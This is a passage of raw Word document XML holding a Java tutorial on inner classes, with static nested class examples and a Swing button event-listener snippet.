          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello from the anonymous class!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793AF1A"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3004731"/>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17B126AE"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3004731"/>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02259777"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3004731"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        greeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>greet</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773050D2"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3004731"/>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042A519F" w14:textId="72AC9E5E"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3004731"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF9E0F" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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Static Nested Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F7DA5" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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static nested class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a static inner class that doesn’t require an instance of the outer class to be instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677E77A"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w: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60F7ED17"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356402"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticVariable </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Static Variable"</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F66EC"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C1DDC"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356402"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StaticNestedClass</w:t>
      </w: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46826E9E"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356402"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w: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14DA7A3E"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356402"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Accessing static variable: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C906402"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356402"/>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6A595F24"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356402"/>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01A3CDAF"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041671BE"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C163E38"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w: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2C5DD886"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356402"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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27484FBE"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356402"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StaticNestedClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nested </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OuterClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StaticNestedClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27F54E"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        nested</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FA7D8A"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356402"/>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7FCFC41A" w14:textId="0CC09F66"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356402"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00636B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE1D2D1" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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Use of Inner Classes in Projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58614FB3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0013258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 inner classes are widely used in real-world projects. Here are a few use cases where I’ve utilized inner classes in projects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B7393" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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vent Handling in GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inner classes are commonly used for event handling, particularly with GUIs (like Swing). Anonymous inner classes are used to implement event listener interfaces directly within methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCD9750" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00A056CD">
      <w:pPr>
        <w:ind w:left="720"/>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utton.addActionListener(new ActionListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932816C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00A056CD">
      <w:pPr>
        <w:ind w:left="720"/>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actionPerformed(ActionEvent e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519BF043" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00A056CD">
      <w:pPr>
        <w:ind w:left="720"/>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Button clicked!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D26FC" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00A056CD">
      <w:pPr>
        <w:ind w:left="720"/>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EAD79ED" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00A056CD">
      <w:pPr>
        <w:ind w:left="720"/>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02B2D8D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00132584">
      <w:pPr>
        <w:numPr>
